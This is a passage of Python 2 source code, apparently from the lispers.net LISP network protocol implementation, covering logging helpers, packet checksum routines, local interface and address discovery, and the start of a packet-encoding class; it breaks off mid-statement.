def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if the logfile exists. If not, either it is startup time and
# one needs to be created, or another procedure rotated the file out of the
# directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
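#
# For example (illustrative), lisp_i_am("itr") sets lisp_i_am_itr to True,
# sets lisp_log_id to "itr", and normalizes a hostname such as
# "host1.example.com" to "host1" for logging.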
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args:
if (arg == "force"): continue
print arg,
#endfor
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# fprint
#
# Do a lprint() when debug logging is off but the "force" flag is supplied,
# so the message is always printed.
#
def fprint(*args):
nargs = args + ("force",)
lprint(*nargs)
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_caller
#
# Print out calling stack.
#
def lisp_print_caller():
fprint(traceback.print_last())
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text-based bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
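#
# Examples (illustrative, Python 2 semantics):
# >>> lisp_hex_string(0xff)
# 'ff'
# >>> lisp_hex_string(2**64 - 1)
# 'ffffffffffffffff'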
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
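#
# Examples (illustrative):
# >>> lisp_print_elapsed(0)
# 'never'
# >>> lisp_print_elapsed(time.time() - 90)
# '0:01:30'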
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it to an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
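#
# Examples (illustrative):
# >>> lisp_convert_6to4("::ffff:10.1.1.1")
# '10.1.1.1'
# >>> lisp_convert_6to4("2001:db8::1")
# '2001:db8::1'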
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
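#
# A minimal sketch (illustrative): lisp_convert_4to6("10.1.1.1") returns a
# lisp_address() with AFI IPv6 storing "::ffff:10.1.1.1", while an IPv6
# input string is stored as-is.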
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socket.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) == 4):
if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
ipv4[3].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise it could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
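#
# Examples (illustrative):
# >>> lisp_gethostbyname("10.1.1.1")
# '10.1.1.1'
# >>> lisp_gethostbyname("2001:db8::1")
# '2001:db8::1'
# >>> lisp_gethostbyname("localhost")    # resolved via DNS/hosts, typically
# '127.0.0.1'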
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
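#
# Minimal usage sketch (hypothetical header values, for illustration only):
#
# hdr = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(28), 0, 0, 64, 17, 0)
# hdr += socket.inet_aton("10.0.0.1") + socket.inet_aton("10.0.0.2")
# hdr = lisp_ip_checksum(hdr)    # bytes 10-11 now hold the header checksum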
#
# lisp_icmp_checksum
#
# Checksum an ICMP Destination Unreachable Too-Big message. It statically
# checksums 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_igmp_checksum
#
# Compute IGMP checksum. This is specialized for an IGMP query 12-byte
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get an interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endfor
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is in the form "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
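#
# Examples (illustrative):
# >>> lisp_is_mac_string("0050-56b3-0123")
# True
# >>> lisp_is_mac_string("0050-56b3-0123/48")
# True
# >>> lisp_is_mac_string("10.1.1.1")
# False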
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow only
# names with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = d.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
if (address.is_private_address()): return(address)
addr = a
#endfor
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#enddef
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
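# For example (illustrative): LISP_ADDR_SELECT="eth0:2" selects the second
# address on eth0, LISP_ADDR_SELECT="2" selects the second address on the
# first usable interface, and LISP_ADDR_SELECT="eth0" selects the first
# address on eth0.
#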
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
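#
# For example (illustrative), a lisp.config line containing
# "rle-address = 224.1.1.1" adds "224.1.1.1" to the returned array, while
# unicast RLE addresses and commented-out lines are skipped.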
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
